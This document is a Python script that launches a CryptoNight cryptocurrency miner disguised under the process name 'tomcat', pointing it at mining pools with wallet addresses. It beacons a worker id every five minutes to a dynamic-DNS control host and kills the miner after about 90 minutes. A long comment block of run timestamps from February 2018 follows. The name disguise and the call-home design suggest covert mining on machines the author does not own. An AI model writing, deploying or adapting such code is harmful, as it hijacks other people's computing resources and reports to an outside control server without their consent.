import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:01:07.545545
#2018-02-17 16:48:07.037183
#2018-02-17 18:36:07.637373
#2018-02-17 20:25:06.944999
#2018-02-17 22:12:01.751578
#2018-02-17 23:56:06.903278
#2018-02-18 01:47:06.508854
#2018-02-18 03:36:08.036874
#2018-02-18 05:23:05.371787
#2018-02-18 07:14:06.879790
#2018-02-18 09:02:05.748929
#2018-02-18 10:49:02.268054
#2018-02-18 12:34:05.711807
#2018-02-18 14:21:03.886813
#2018-02-18 16:12:05.958225
#2018-02-18 18:00:09.539202
#2018-02-18 19:48:05.336003
#2018-02-18 21:34:07.010030
#2018-02-18 23:23:03.130100
#2018-02-19 01:10:07.512726
#2018-02-19 02:56:05.658893
#2018-02-19 04:43:05.744423
#2018-02-19 06:28:03.962173
#2018-02-19 08:18:06.808352
#2018-02-19 10:07:03.468887
#2018-02-19 11:56:06.329406
#2018-02-19 13:43:08.564717
#2018-02-19 15:31:07.490404
#2018-02-19 17:18:08.491956
#2018-02-19 19:07:06.025241
#2018-02-19 20:53:03.910194
#2018-02-19 22:42:06.537338
#2018-02-20 00:27:04.720462
#2018-02-20 02:15:01.399017
#2018-02-20 04:06:03.655667
#2018-02-20 05:49:06.808619
#2018-02-20 07:35:01.614942
#2018-02-20 09:19:06.055790
#2018-02-20 11:03:07.931220
#2018-02-20 12:49:05.855065
#2018-02-20 14:33:09.264483
#2018-02-20 16:18:10.034452
#2018-02-20 18:04:08.926055
#2018-02-20 19:54:04.755433
#2018-02-20 21:41:03.977089
#2018-02-20 23:23:03.876317
#2018-02-21 01:07:04.258896
#2018-02-21 02:53:01.992835
#2018-02-21 04:42:07.997068
#2018-02-21 06:30:04.471663
#2018-02-21 08:16:01.564115
#2018-02-21 10:02:08.692343
#2018-02-21 11:52:01.347921
#2018-02-21 13:42:06.612741
#2018-02-21 15:26:08.789488
#2018-02-21 17:16:01.943599
#2018-02-21 19:04:08.213783
#2018-02-21 20:50:09.187494
#2018-02-21 22:36:08.576550
#2018-02-22 00:25:07.497163
#2018-02-22 02:13:07.128687
#2018-02-22 03:58:06.680802
#2018-02-22 05:45:03.296104
#2018-02-22 07:32:04.486817
#2018-02-22 09:19:07.837019
#2018-02-22 11:06:04.755082
#2018-02-22 12:52:06.468149
#2018-02-22 14:38:10.323999
#2018-02-22 16:23:06.090808
#2018-02-22 18:10:08.408858
#2018-02-22 19:58:08.299321
#2018-02-22 21:47:03.641926
#2018-02-22 23:36:05.774366
#2018-02-23 01:23:05.880046
#2018-02-23 03:10:05.160052
#2018-02-23 04:57:05.716262
#2018-02-23 06:43:07.577186
#2018-02-23 08:33:07.487704
#2018-02-23 10:48:01.987603
#2018-02-23 12:44:05.174633
#2018-02-23 14:28:04.298434
#2018-02-23 16:18:02.011889
#2018-02-23 18:05:05.038927
#2018-02-23 19:51:02.180639
#2018-02-23 21:34:05.456975
#2018-02-23 23:21:07.457959
#2018-02-24 01:14:04.088295
#2018-02-24 03:04:01.871974
#2018-02-24 04:50:07.568508
#2018-02-24 06:36:01.448783
#2018-02-24 08:25:06.098942
#2018-02-24 10:11:06.044935
#2018-02-24 12:06:04.514724
#2018-02-24 13:53:06.156864
#2018-02-24 15:40:06.123768
#2018-02-24 17:34:07.184868
#2018-02-24 19:21:02.189316
#2018-02-24 21:11:07.269372
#2018-02-24 23:44:04.980312
#2018-02-25 03:41:07.904303
#2018-02-25 07:26:07.316019